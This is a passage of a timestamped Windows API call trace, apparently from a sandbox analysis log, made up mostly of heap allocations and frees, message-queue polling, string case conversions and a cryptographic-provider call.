out: hHeap=0x25c0000) returned 1 [0206.227] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0206.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0206.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0206.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0206.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0206.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0206.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0206.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0206.227] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0206.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.228] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0206.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0206.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0206.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0206.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0206.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0206.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0206.229] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0206.229] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.229] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0206.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0206.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0206.229] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.229] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0206.229] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.229] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.229] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.229] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.230] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.230] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.230] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0206.230] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0206.230] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.230] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.230] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0206.230] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.230] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0206.230] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0206.230] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0206.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0206.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0206.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.231] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2940) returned 1 [0206.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0206.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0206.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0206.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0206.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0206.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0206.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0206.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0206.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0206.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0206.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0206.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0206.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0206.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0206.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0206.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0206.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0206.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0206.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0206.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0206.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0206.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0206.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0206.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0206.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0206.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0206.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0206.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0206.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0206.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0206.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0206.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0206.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0206.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0206.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0206.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0206.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0206.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0206.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0206.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0206.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0206.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0206.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0206.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0206.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0206.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0206.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0206.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0206.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0206.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0206.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0206.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0206.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0206.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0206.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0206.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0206.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0206.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0206.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0206.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0206.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0206.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0206.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0206.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0206.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0206.236] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0206.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0206.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0206.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0206.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0206.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0206.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0206.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0206.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0206.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0206.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0206.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0206.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0206.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0206.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0206.237] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0206.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0206.237] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0206.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0206.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0206.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c18 [0206.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0206.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0206.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0206.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0206.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0206.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0206.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0206.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0206.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0206.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0206.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0206.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0206.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0206.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa020 [0206.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0206.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0206.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0206.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0206.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0206.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0206.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0206.239] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0206.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0206.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0206.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0206.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0206.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0206.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0206.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0206.239] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0206.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0206.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0206.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0206.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0206.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0206.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0206.240] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0206.240] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0206.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0206.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0206.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0206.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0206.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0206.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0206.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0206.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0206.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0206.240] 